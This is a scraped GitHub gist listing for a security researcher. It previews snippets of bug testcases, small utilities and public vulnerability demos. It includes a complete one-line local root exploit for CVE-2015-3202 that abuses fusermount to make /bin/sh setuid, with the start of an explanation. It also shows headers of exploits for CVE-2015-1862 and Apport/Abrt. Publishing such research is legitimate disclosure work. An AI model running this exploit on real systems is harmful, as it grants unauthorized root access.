Tavis Ormandy taviso

@taviso
taviso / fbmon.c
Last active Jul 22, 2019
fbmon bug
View fbmon.c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
/*
$ gcc fbmon.c
$ ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
@taviso
taviso / msdn.sh
Created Jul 12, 2019
Read MSDN pages in a terminal.
View msdn.sh
# man equivalent for msdn pages so I can look them up in the console.
function msdn()
{
local lucky="https://www.google.com/search?btnI"
local query="q=site:docs.microsoft.com+inurl:/en-us/windows/desktop/"
local title="Microsoft Developer Network"
local cache="${HOME}/.msdn/"
if ! type lynx > /dev/null; then
echo "error: lynx is not installed, please install it." 1>&2
@taviso
taviso / testcase.ps
Last active Aug 30, 2018
GhostScript Testcase
View testcase.ps
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
% ImageMagick define setpagedevice, just remove their definition. This doesn't
% do anything if not using ImageMagick.
userdict /setpagedevice undef
% function to check if we're on Linux or Windows
/iswindows {
% Just checking if paths contain drive
@taviso
taviso / DefText.c
Created Nov 8, 2017
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
View DefText.c
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;
@taviso
taviso / delete-twitter-dm.js
Created Nov 3, 2017
Automate deleting twitter direct messages.
View delete-twitter-dm.js
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
clearInterval(tmr)
return;
}
dm.firstChild.click();
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
@taviso
taviso / CVE-2015-3202
Created May 21, 2015
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
View CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
@taviso
taviso / raceabrt.c
Created Apr 14, 2015
Race condition exploit for CVE-2015-1862
View raceabrt.c
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
@taviso
taviso / newpid.c
Created Apr 14, 2015
Apport/Abrt Vulnerability Demo Exploit.
View newpid.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
View Inject.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
View SetPalette.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>